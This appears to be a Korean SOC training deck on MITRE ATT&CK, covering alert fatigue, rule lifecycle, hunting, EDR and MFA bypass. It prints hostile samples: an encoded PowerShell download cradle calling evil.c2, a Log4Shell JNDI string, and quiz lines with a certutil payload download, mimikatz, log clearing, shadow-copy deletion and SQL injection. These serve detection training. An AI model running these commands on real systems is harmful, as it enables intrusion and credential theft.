보강 설명ATT&CK을 기반으로 한 SOC 운영 대시보드를 설계하는 방법입니다. Tactic별 경보 현황, Coverage 히트맵, 시간대별 경보 분포 등을 포함한 실무 대시보드 구성을 다룹니다. 데이터 원천·오탐 구분·운영 액션까지 연결해야 실무 적용도가 높아…

SOC 대시보드ATT&CK 기반Tactic별 경보

설계 포인트

SOC 대시보드에 필요한 Data Source를 먼저 정리하기
ATT&CK 기반를 어떤 조건으로 탐지할지 구체화하기
룰·대시보드·플레이북을 같은 언어로 정렬하기

튜닝 포인트

화이트리스트·시간대·자산 중요도 조건 추가
False Positive와 False Negative를 따로 점검
검증 결과를 Coverage 점수에 반영하기

운영 적용

분기별 ATT&CK 버전 업데이트를 체크리스트화
CTI·Purple Team 결과를 룰 개선 backlog로 연결
티켓 문장까지 동일한 ATT&CK 용어로 통일

경보 피로(Alert Fatigue) 해결 전략

경보가 많아도 중요한 것을 놓친다 — 품질이 수량을 이겨야 한다

SIEM 운영 심화

경보 피로의 원인과 결과

원인: 오탐률 높은 룰 방치, 임계값 너무 낮음, 중복 경보
결과: 분석가가 경보를 "눌러 끄기" 시작 → 실제 위협 묻힘
조직 영향: SOC 팀 번아웃, 이직률 증가, 탐지 품질 실질적 저하

해결 전략 5가지

경보 감사: 매월 오탐률 TOP 10 룰 리뷰 → 즉시 튜닝 또는 비활성화
우선순위 분류: P1/P2/P3로 나눠 P1만 즉각 대응, P3는 일괄 처리
중복 제거: 동일 소스의 반복 경보를 그룹화·억제
컨텍스트 자동 추가: 경보에 자산 중요도, 사용자 정보 자동 첨부
SOAR 자동 처리: 낮은 위험도 경보 자동 종결 + 로그 기록

경보 품질 지표	목표값	현재 측정 방법
오탐률 (False Positive Rate)	< 40%	종결 경보 중 오탐 비율
분석가 일일 처리 건수	< 20건	티켓 시스템 데이터
경보 → 조사 시작 시간 (MTTA)	< 15분	티켓 생성 → 담당자 배정
경보 억제율 (Suppression Rate)	< 30%	자동 종결 비율
경보 피로 지수	주관적 설문	주간 팀 회의에서 측정

💡 황금 비율: 경보 1,000건 중 분석가가 실제 조사하는 경보는 50~100건이 이상적. 나머지는 자동화 또는 낮은 우선순위 처리

보강 설명 경보 피로는 오탐이 많은 경보 때문에 분석가가 중요한 경보를 놓치는 현상입니다. ATT&CK Coverage를 높이면서도 경보 피로를 줄이는 균형 전략을 다룹니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

경보 피로Alert Fatigue오탐 감소

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
경보 피로·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

탐지 룰 라이프사이클 관리

룰은 코드다 — 버전 관리·리뷰·폐기까지 전체 생명주기를 체계적으로 관리한다

탐지 엔지니어링 심화

작성

신규 룰 작성 (Draft)

ATT&CK 기반 탐지 조건 작성 → Sigma 형식으로 문서화 → 동료 코드 리뷰 → 테스트 환경 배포

테스트

스테이징 테스트 (Testing)

Atomic Red Team으로 정탐 확인 → 오탐 발화 확인 → 임계값 조정 → 2주 모니터링

운영

운영 배포 (Production)

운영 SIEM 배포 → Coverage 점수 업데이트 → 분기별 성능 리뷰 (오탐률, 정탐률)

검토

주기적 재검토 (Review)

ATT&CK 업데이트 반영 여부 확인 → 환경 변화로 오탐 증가 시 튜닝 → 효용 없는 룰 폐기 검토

폐기

폐기 (Deprecated)

6개월 무발화 룰 → 폐기 검토. 단 고위험 Technique는 무발화여도 유지. 폐기 사유 문서화 필수

Git 기반 룰 버전 관리

모든 탐지 룰을 Git 저장소에서 관리
변경 사항은 Pull Request + 코드 리뷰 필수
커밋 메시지에 ATT&CK Technique ID 포함
릴리즈 태그로 운영 환경 배포 기록 관리
GitHub Actions로 Sigma → SIEM 자동 배포

💡 폐기 vs 유지 판단 기준:
6개월 무발화 + ATT&CK에서 Technique 여전히 존재 + Purple Team 검증 성공 = 유지 (공격이 없는 것이지 룰이 나쁜 것이 아님)

보강 설명 탐지 룰은 한 번 만들고 끝이 아닙니다. 환경이 변하고 공격 기법이 진화함에 따라 룰도 지속적으로 관리해야 합니다. 룰 라이프사이클 관리 방법을 다룹니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

룰 라이프사이클룰 유지보수Deprecated 룰

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
룰 라이프사이클·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

위협 헌팅 캠페인 계획 수립: 월간 헌팅 운영

산발적 헌팅이 아닌 체계적 캠페인 — CTI 기반 가설을 월간 일정으로 구조화한다

Threat Hunting 심화

월간 헌팅 캠페인 템플릿

주차	헌팅 주제	ATT&CK 연결	담당
1주	Kerberoasting 흔적 탐색	T1558.003	분석가 A
2주	비인가 RDP 내부 이동	T1021.001	분석가 B
3주	비업무 시간 대용량 업로드	T1567	분석가 A
4주	LOLBin 악용 패턴	T1218	분석가 B
결과 리뷰	발견 사항 공유 + Coverage 업데이트	전체	팀 전체

캠페인 계획 수립 체크리스트

☐ 이번 달 CTI에서 가장 많이 언급된 TTP 3개 선정
☐ 해당 TTP의 현재 Coverage 점수 확인
☐ 가설 수립 (테스트 가능한 형태로)
☐ 필요 데이터 소스 가용성 확인
☐ 헌터 배정 및 시간 확보 (주 4~8시간)
☐ 결과 문서화 형식 사전 합의
☐ 발견 시 인시던트 전환 절차 확인

✅ 헌팅 캠페인 산출물:
발견 없음 → Coverage 점수 2점 → 플레이북 저장소 등록
발견 있음 → 인시던트 대응 + Coverage 점수 3점 검토

보강 설명한 달 동안 진행할 위협 헌팅 캠페인을 계획하는 방법입니다. CTI 정보와 Coverage 분석을 기반으로 헌팅 우선순위를 정하고, 팀 역할과 일정을 배분합니다. 데이터 원천·오탐 구분·운영 액션까지 연결해야 실무 적용도가 높아…

T1558.003T1021.001헌팅 캠페인

설계 포인트

T1558.003에 필요한 Data Source를 먼저 정리하기
T1021.001를 어떤 조건으로 탐지할지 구체화하기
룰·대시보드·플레이북을 같은 언어로 정렬하기

튜닝 포인트

화이트리스트·시간대·자산 중요도 조건 추가
False Positive와 False Negative를 따로 점검
검증 결과를 Coverage 점수에 반영하기

운영 적용

분기별 ATT&CK 버전 업데이트를 체크리스트화
CTI·Purple Team 결과를 룰 개선 backlog로 연결
티켓 문장까지 동일한 ATT&CK 용어로 통일

실전 분석: 악성 PowerShell 스크립트 해독과 ATT&CK 매핑

Base64 디코딩 → 행위 파악 → Technique 매핑 → 탐지 조건 도출

스크립트 분석

# 탐지된 PowerShell 커맨드 라인 powershell.exe -w hidden -NoP -Ep Bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0AT2JqAGUAYwB0 AIABTAHMATQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQA KQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4A ZwAoACcAaAB0AHQAcABzADoALwAvAGUAdgBpAGwA LgBjADIALwBwAGEAeQBsAG8AYQBkACcAKQA= # Base64 디코딩 후 (PowerShell로 디코딩) IEX (New-Object Net.WebClient) .DownloadString('https://evil.c2/payload') # 의미: 원격 URL에서 스크립트 다운로드 후 즉시 실행

# PowerShell 디코딩 방법 $enc = "SQBFAFgA..." [System.Text.Encoding]::Unicode .GetString([Convert]::FromBase64String($enc)) # 또는 온라인 도구: CyberChef # gchq.github.io/CyberChef (From Base64 → Decode)

ATT&CK 매핑 결과

T1059.001 PowerShell — 악성 스크립트 실행 플랫폼

T1027 Obfuscated Files — Base64 인코딩으로 내용 은닉

T1105 Ingress Tool Transfer — DownloadString으로 외부 페이로드 로드

T1562.001 Bypass (간접) — -Ep Bypass로 실행 정책 우회

✅ 탐지 조건 도출:
CommandLine CONTAINS(-Enc AND -Ep Bypass AND -w hidden)
AND Image ENDSWITH powershell.exe
→ High 신뢰도 T1059.001 경보

보강 설명 실제 악성 PowerShell 스크립트(샘플)를 분석해 ATT&CK 매핑하는 실습입니다. Base64 디코딩부터 행위 분석, Technique 매핑까지 전 과정을 다룹니다. 근거 로그와 다음 행동까지 붙여 적으면 실무 발표와 문서화가 쉬워집니다.

T1059.001PowerShell 분석Base64 디코딩

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
T1059.001를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

멀웨어 분석 기초: 정적 분석으로 ATT&CK 추출

실행 없이 파일을 분석해 사용된 Technique를 추출하는 기초 기법

멀웨어 분석

정적 분석 순서

파일 식별 & 해시 계산 — file 명령, sha256sum, VirusTotal 제출

문자열 추출 (strings) — IP, URL, 도메인, 레지스트리 키, 오류 메시지 발견 가능

PE 임포트 테이블 분석 — DLL과 API 함수 목록 → 기능 추정 (CreateRemoteThread = 인젝션)

ATT&CK 매핑 — 분석 결과를 Technique로 매핑. 샌드박스 자동 분석 결과 활용

분석 발견	추정 Technique	신뢰도
VirtualAlloc + WriteProcessMemory API	T1055 Process Injection	High
CreateService + StartService API	T1543.003 Windows Service	High
RegSetValueEx + HKCU\Run 문자열	T1547.001 Registry Run Key	High
WNetEnumResource API	T1135 Network Share Discovery	Medium
URLDownloadToFile API	T1105 Ingress Tool Transfer	High
CryptEncrypt / AES 관련 문자열	T1027 Obfuscation (암호화)	Medium

💡 무료 샌드박스 도구:
any.run (대화형 분석) · VirusTotal · Hybrid Analysis · Cuckoo Sandbox (자체 구축)

보강 설명 멀웨어 정적 분석을 통해 ATT&CK Technique를 추출하는 기초 방법입니다. 파일 해시, 문자열 추출, 임포트 테이블 분석 등의 기초 기법을 다룹니다. 대표 예시와 연결해 기억하면 이해가 더 오래 남습니다.

정적 분석파일 해시임포트 테이블

이해 포인트

정적 분석를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

MITRE Engage: 기만(Deception) 전략으로 공격자 역이용

ATT&CK의 공격 행위를 알기에 가능한 적극적 방어 — 공격자를 허니팟으로 유도한다

고급 방어 개념

MITRE Engage 핵심 개념

허니팟(Honeypot): 공격자를 유인하는 가짜 시스템. 접근 즉시 경보 → High Confidence 탐지
허니토큰(Honeytoken): 가짜 자격증명·파일. 사용 시 즉각 탐지 (Valid Accounts 탐지용)
허니넷(Honeynet): 기만 네트워크 세그먼트. Lateral Movement 탐지에 효과적
기만 자격증명: LSASS 메모리에 가짜 비밀번호 → 공격자가 사용 시 탐지

ATT&CK과 Engage 연결

공격자가 T1082 Discovery 시 → 허니 서버가 탐지 신호 발생
공격자가 T1078 Valid Accounts 시도 → 허니토큰 계정 사용 탐지
공격자가 T1003 Credential Dumping → 가짜 크리덴셜 탐지

실무 적용 아이디어

허니토큰 계정: AD에 "svc_honeypot" 계정 생성 → 로그인 시도 즉각 경보
허니파일: 파일 서버에 "비밀_비밀번호_목록.xlsx" 생성 → 접근 시 경보
허니 RDP 서버: 내부 특정 IP의 RDP 접속 → 즉각 Lateral Movement 탐지
AWS 허니토큰: 사용되지 않는 IAM 키 생성 → API 호출 시 즉각 탐지

📍 참고: engage.mitre.org — MITRE Engage 공식 사이트. ATT&CK 매트릭스와 연동된 기만 전략 데이터베이스 제공

보강 설명 MITRE Engage는 공격자를 기만하고 지연시키는 방어 전략 프레임워크입니다. ATT&CK의 공격 행위를 역이용해 허니팟, 허니토큰, 기만 네트워크를 설계하는 개념을 소개합니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

MITRE Engage허니팟허니토큰

이해 포인트

MITRE Engage를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
허니팟 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

EDR 심층 이해: 탐지 레이어와 SOC 활용법

EDR이 어떻게 공격을 감지하는지 알아야 탐지 공백도 파악할 수 있다

EDR 심화

EDR 탐지 레이어 4단계

1. 커널 드라이버 레이어: 프로세스 생성·종료, 파일 IO, 레지스트리 변경, 네트워크 연결을 OS 수준에서 모니터링 → 가장 정확한 데이터 수집
2. 사용자 공간 후킹: 윈도우 API 함수 후킹으로 악성 호출 탐지 (CreateRemoteThread, WriteProcessMemory 등)
3. 메모리 스캔: 프로세스 메모리에서 악성 코드 시그니처 검색. 인젝션 탐지에 핵심
4. 행위 분석 (NGAV): 이벤트 체인을 학습된 패턴과 비교해 악성 행위 판단

EDR 데이터 SOC 활용 전략

텔레메트리 → SIEM 연동: EDR이 수집한 프로세스·네트워크·파일 이벤트를 SIEM으로 전송해 상관 분석
원격 조사: 경보 발화 시 해당 호스트에서 라이브 프로세스·파일·네트워크 상태 즉시 조회
격리 자동화: SOAR와 연동해 특정 조건 만족 시 호스트 자동 격리
EDR 탐지 공백: EDR이 없는 서버·IoT 기기 → Coverage 0점 구간

⚠️ EDR 한계: 네트워크 기기, 레거시 시스템, IoT에는 EDR 설치 불가. 이 구간은 Network 탐지로 보완 필요 — Coverage 분석에 반드시 포함

보강 설명 EDR이 어떻게 동작하는지 이해하면 탐지 룰 설계와 포렌식 분석이 더 정교해집니다. 커널 레벨 훅, 프로세스 모니터링, 메모리 스캔, 네트워크 차단까지 EDR의 탐지 레이어를 다룹니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

EDR 동작 원리커널 훅프로세스 모니터링

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

실전 케이스: 소프트웨어 공급망 업데이트 탐지

정상 업데이트 프로세스와 공급망 공격의 차이 — 설치 후 행위가 핵심 탐지 포인트

공급망 탐지

정상 업데이트 행위 패턴

설치 직후: 서비스 재시작만 발생
네트워크: 벤더 CDN으로만 통신 (allowlisted)
파일: 설치 디렉토리 내 파일만 수정
프로세스: 업데이트 프로세스 → 정상 서비스 프로세스만 생성

공급망 공격 행위 패턴 (의심)

설치 직후: 비정상 외부 IP 통신 시작
네트워크: 알 수 없는 신규 도메인 쿼리
프로세스: 업데이트 프로세스 → cmd.exe, powershell.exe 생성
파일: 설치 디렉토리 외 경로에 파일 생성

탐지 전략: 업데이트 후 행위 모니터링

설치 후 5분 내 외부 통신: 새 소프트웨어 설치 이벤트 → 5분 내 신규 외부 연결 감지
업데이트 프로세스 자식 프로세스: updater.exe → cmd.exe 체인 탐지
코드 서명 검증: 설치 파일 서명 발급자가 벤더와 일치하는지 확인
빌드 해시 비교: 벤더 공식 SHA256과 설치 파일 해시 비교

💡 소프트웨어 Bill of Materials(SBOM): 사용 중인 소프트웨어 컴포넌트 목록을 관리하면 공급망 리스크 평가와 업데이트 모니터링이 수월해짐

보강 설명소프트웨어 업데이트 채널을 통한 공급망 공격을 탐지하는 방법입니다. 정상 업데이트와 악성 업데이트를 구분하는 행위 기반 탐지 전략을 다룹니다. 시간축과 로그 근거를 함께 묶어 설명하면 공격 체인의 맥락이 훨씬 선명해집니다.

공급망 탐지소프트웨어 업데이트T1195

시나리오 확장

공급망 탐지가 앞뒤 단계와 어떻게 이어지는지 정리
소프트웨어 업데이트를 시간축으로 놓고 체인으로 연결하기
공격자 목적과 피해 자산을 한 문장으로 설명

판단 포인트

정상 운영과 다른 기준 2~3개를 명확히 적기
계정·프로세스·네트워크 증거를 함께 교차 보기
차단 시점과 피해 최소화 지점을 구분해 보기

실무 적용

즉시 조치와 후속 조치를 나눠서 제안
보고 문장에는 ATT&CK ID와 영향 범위 포함
재발 방지를 위한 룰·정책 보완점까지 적기

최종 스피드 매핑 라운드: 10개 로그 × 30초

직관적으로 — 10개 로그를 각 30초 안에 Technique로 매핑하라 (팀 경쟁)

최종 실전 실습

net localgroup administrators /domain
→ ?

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d "C:\Temp\evil.exe"
→ ?

certutil -urlcache -split -f http://1.2.3.4/payload.exe payload.exe
→ ?

wevtutil cl Security
→ ?

mimikatz # sekurlsa::logonpasswords
→ ?

ssh -L 8080:internal.server:80 user@jumphost
→ ?

xcopy /S /E \\filesvr\secrets C:\Users\Public\tmp\
→ ?

wmic shadowcopy delete /nointeractive
→ ?

GET /login.php?user=admin'OR'1'='1 HTTP/1.1 → 200 OK
→ ?

PROXY LOG: PUT https://drive.google.com/upload/... 3.8GB
→ ?

보강 설명 지금까지 배운 내용을 모두 활용하는 최종 스피드 매핑 라운드입니다. 10개의 로그/이벤트를 빠르게 매핑하면서 실력을 점검합니다. 팀 경쟁으로 진행하면 더 재미있습니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

스피드 매핑최종 실습ATT&CK 체화

이해 포인트

스피드 매핑를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
최종 실습 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

스피드 매핑 해설 — 10개 로그 정답

여러 Technique 매핑도 가능 — 근거가 있으면 부분 정답 인정

최종 실전 해설

#	핵심 Technique	판단 근거
1	T1069.002 Domain Groups	localgroup + /domain = 도메인 그룹 열거
2	T1547.001 Registry Run Key	HKCU\Run + REG_SZ + Temp 경로 = Persistence
3	T1218 + T1105 LOLBin + Tool Transfer	certutil -urlcache = LOLBin 파일 다운로드
4	T1070.001 Clear Windows Event Logs	wevtutil cl Security = 보안 로그 삭제
5	T1003.001 LSASS Memory	Mimikatz sekurlsa = LSASS 자격증명 추출

#	핵심 Technique	판단 근거
6	T1572 Protocol Tunneling	SSH -L = SSH 포트 포워딩 = 터널링
7	T1039 Network Shared Drive	xcopy \\filesvr = 네트워크 공유 드라이브 복사
8	T1490 Inhibit System Recovery	wmic shadowcopy delete = VSS 삭제
9	T1190 Exploit Public-Facing App	SQLi 패턴(OR 1=1) + 200 응답 = 성공적 익스플로잇
10	T1567.002 Exfil to Cloud Storage	PUT drive.google.com 3.8GB = 클라우드 스토리지 유출

🏆 채점 기준: 정확한 Technique (2점) + 판단 근거 설명 (1점) + Sub-technique까지 명시 (가산점 1점). 10개 × 3점 = 30점 + 가산점 10점 = 총 40점 만점

보강 설명 스피드 매핑 해설입니다. 각 팀의 답을 발표한 후 공개합니다. 일부 로그는 여러 Technique가 답이 될 수 있음을 강조해 주세요. 근거 로그와 다음 행동까지 붙여 적으면 실무 발표와 문서화가 쉬워집니다.

스피드 매핑 해설정답 확인다양한 해석

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
스피드 매핑 해설를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

OT/ICS 환경 ATT&CK 적용: IT-OT 경계 보안

ICS ATT&CK 매트릭스 — SCADA·PLC 공격은 IT와 다른 접근이 필요하다

ICS 보안

ICS ATT&CK 핵심 차이점

도메인 분리: attack.mitre.org/matrices/ics/ — IT와 별개 매트릭스
공격 목적: 데이터 탈취보다 물리적 피해, 생산 중단, 안전 침해
타겟: PLC, HMI, RTU, Engineering Workstation, Historian
프로토콜: Modbus, DNP3, OPC-UA, PROFINET — IT와 다른 프로토콜
패치 주기: 수년 → 취약점 장기 노출, 패치 불가 레거시 시스템

대표 ICS Technique

T0800 Activate Firmware Update Mode — 펌웨어 강제 업데이트로 제어 장치 무력화
T0831 Manipulation of Control — 센서 값 조작으로 오작동 유발
T0882 Theft of Operational Info — 공정 데이터 유출

IT-OT 경계 보안 원칙

물리적 격리: IT-OT 네트워크 완전 분리 (에어갭 또는 단방향 게이트웨이)
DMZ 설계: 데이터 공유 필요 시 DMZ를 통한 단방향 데이터 흐름
화이트리스트 방화벽: OT 네트워크는 허용 목록 기반 엄격한 정책
OT 전용 EDR: Claroty, Dragos, Nozomi 같은 OT 특화 모니터링
이상 행위 탐지: 정상 공정 패턴에서 벗어난 프로토콜 명령 탐지

🚨 ICS 사고 시 특수 고려: IT 사고와 달리 즉각 격리가 물리적 피해나 안전 사고를 유발할 수 있음. ICS 사고 대응은 운영팀·안전팀과 반드시 공조

보강 설명 산업제어시스템(ICS/OT) 환경에서의 ATT&CK 적용입니다. ICS 전용 ATT&CK 매트릭스가 있으며, IT 환경과 다른 공격 경로와 탐지 방법을 다룹니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

T0800ICS 보안OT 환경

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T0800·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

실전 사례: Log4Shell(CVE-2021-44228) 공격 ATT&CK 분석

JNDI 인젝션 → 원격 코드 실행 → 내부 확산 — 역대 최대 취약점의 공격 체인

실전 사례 분석

T1190 — JNDI 인젝션 (Initial Access)

HTTP 헤더(User-Agent, X-Forwarded-For 등)에 ${jndi:ldap://evil.com/a} 삽입 → Log4j가 외부 LDAP 서버 연결

T1059 — 원격 코드 실행 (Execution)

LDAP 응답으로 악성 Java 클래스 로드 → 서버 프로세스 컨텍스트에서 임의 코드 실행

T1071 — C2 연결 수립 (C&C)

실행된 코드가 공격자 C2로 역방향 연결 → Cobalt Strike 등 C2 비컨 설치

T1046/T1021 — Discovery & Lateral Movement

내부 네트워크 스캔 후 다른 시스템으로 이동 (같은 취약점 재활용 포함)

# Log4Shell 탐지: access.log에서 JNDI 패턴 203.0.113.9 - [18/Dec/2021:04:22:11] "GET / HTTP/1.1" 200 - User-Agent: ${jndi:ldap://evil.c2:1389/a} # WAF 탐지 시그니처 PATTERN: \$\{jndi:(ldap|rmi|dns|...):// # 변형: ${${lower:j}ndi:...} 우회 시도도 탐지

탐지 포인트

WAF: JNDI 패턴을 포함한 HTTP 요청
DNS: 서버 IP에서 외부 도메인으로 아웃바운드 쿼리 (서버가 DNS 쿼리를 보내면 이상)
EDR: Java 프로세스가 cmd/sh 생성
FW: 애플리케이션 서버 → 외부 임의 IP 아웃바운드

보강 설명 Log4Shell(CVE-2021-44228)은 2021년 발견된 가장 심각한 취약점 중 하나입니다. 이 취약점을 통한 공격 체인을 ATT&CK으로 분석하면서 실제 인시던트 분석 방법을 익힙니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1190Log4ShellCVE-2021-44228

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1190 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

MFA 우회 공격 분석: MFA가 있어도 뚫린다

MFA Fatigue · Adversary-in-the-Middle · SIM Swapping — MFA 우회 기법과 탐지 전략

인증 공격 분석

 MFA Fatigue (T1621)
공격자가 탈취된 비밀번호로 반복 로그인 시도
피해자에게 수십 개의 MFA 푸시 알림 발송
피해자가 지쳐서 "허용" 클릭 → 공격자 로그인 성공
탐지: 짧은 시간 내 다수 MFA 요청 거부 후 수락
완화: Number Matching(숫자 매칭) MFA 설정


 Adversary-in-the-Middle (T1557)
피싱 → 가짜 로그인 페이지(EvilProxy 등)
피해자 입력 → 즉각 실제 서비스에 전달 → OTP 실시간 탈취
세션 쿠키 탈취로 MFA 완전 우회
탐지: 같은 세션에서 지리적 불가능 위치 변경
완화: FIDO2 하드웨어 키(피싱 불가)


 SIM Swapping
통신사 직원 매수 또는 사회공학으로 번호 이전
SMS OTP를 공격자가 수신
SMS 기반 MFA 완전 우회
탐지: 갑작스러운 통신사 변경 후 로그인
완화: SMS OTP 대신 Authenticator 앱·하드웨어 키 사용

✅ MFA 강화 로드맵: SMS OTP(낮음) → Authenticator 앱(중간) → Number Matching + Context 기반(높음) → FIDO2 하드웨어 키(최고) — 임원·특권 계정은 최소 FIDO2 요구

보강 설명 MFA가 있어도 우회 방법이 있습니다. MFA Fatigue(지속 푸시 알림으로 피로 유발), Adversary-in-the-Middle(실시간 OTP 탈취), SIM Swapping 등이 대표적입니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

T1111MFA 우회MFA Fatigue

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1111·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

실습: 탐지 룰 상호 리뷰 (15분)

짝을 지어 서로의 룰을 리뷰 — 건설적 피드백으로 룰 품질을 함께 높인다

상호 리뷰 실습

리뷰 방법

실습 2 또는 실습 6에서 작성한 탐지 룰을 파트너와 교환
아래 체크리스트를 기준으로 5분간 룰 분석
3가지 강점과 2가지 개선점을 메모
5분간 건설적 피드백 전달
피드백을 반영해 룰 수정

자주 발견되는 룰 문제점

화이트리스트 없이 배포 → 오탐 폭발
임계값을 근거 없이 설정 (왜 10개인가?)
ATT&CK 태그 없음 → Coverage 분석 불가
오탐 케이스 문서화 없음
검증 계획 없음 → 실제 동작 보장 불가

리뷰 체크리스트

✓

ATT&CK Technique 연결이 올바른가?

✓

탐지 조건이 구체적이고 명확한가?

✓

알려진 정상 케이스가 제외되었는가?

✓

임계값에 Baseline 근거가 있는가?

✓

다음 조사 가이드가 포함되었는가?

✓

검증 방법이 제안되었는가?

보강 설명짝을 지어 서로의 탐지 룰을 리뷰하는 실습입니다. 동료 코드 리뷰처럼 탐지 룰도 리뷰를 받으면 품질이 올라갑니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

탐지 룰 리뷰동료 리뷰피드백

설명 확장

탐지 룰 리뷰 기준으로 첫 단서를 먼저 분류하기
동료 리뷰를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

고급 Hunting: 통계 기반 이상 탐지 기법

키워드 매칭을 넘어 — 빈도·표준편차·엔트로피로 숨겨진 이상을 찾는다

고급 헌팅

Long Tail 분석

정상 행위는 자주 발생하는 '짧은 꼬리'에 집중되고, 이상 행위는 드물게 발생하는 '긴 꼬리' 구간에 숨어 있다

